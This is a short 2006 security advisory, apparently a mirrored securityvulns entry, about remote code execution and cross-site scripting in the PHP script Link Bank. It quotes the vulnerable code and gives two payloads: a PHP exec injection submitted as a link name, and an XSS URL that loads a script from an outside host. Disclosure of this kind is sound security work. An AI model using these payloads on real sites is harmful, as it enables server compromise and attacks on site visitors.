Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11723
HistoryMar 07, 2006 - 12:00 a.m.

link bank code execution and xss

2006-03-0700:00:00
vulners.com
10

——– summary
software: Link Bank
vendors website: http://daverave.64digits.com/index.php?page=linkbank
versions: n/a
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: high

——– description
Link Bank does not sanatise post sumbited to it allowing users to
insert data that can be used malisiously. after it is submited the
data goes to a .txt file witch the application reads and executes
to display the links submited. along with this it is vulnerable
to xss due to the application not sanatising the variable again.

    in ./content/index.txt:

14 <?php
15 include("links.txt");
16 ?>

    in ./content/add_link.txt:

2 $url_name = $_REQUEST['url_name'];
3 $url = $_REQUEST['url'];
4 $img = $_REQUEST['img'];
5 $filename = "content/links.txt";
6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

    in ./iframe.php:

3 <title>Link Bank - <?php echo"$site";?></title>

——– exploit(s)
code execution:
submit something like <?php exec($cmd) ?> as a link name

    xss:

http://example.com/iframe.php?site=&#37;3C/title&#37;3E&#37;3C/head&#37;3E&#37;3Cscript&#37;20src=http://notlegal.ws/xss.js&#37;3E&#37;3C/script&#37;3E

——– credit
author(s): retard
email: [email protected]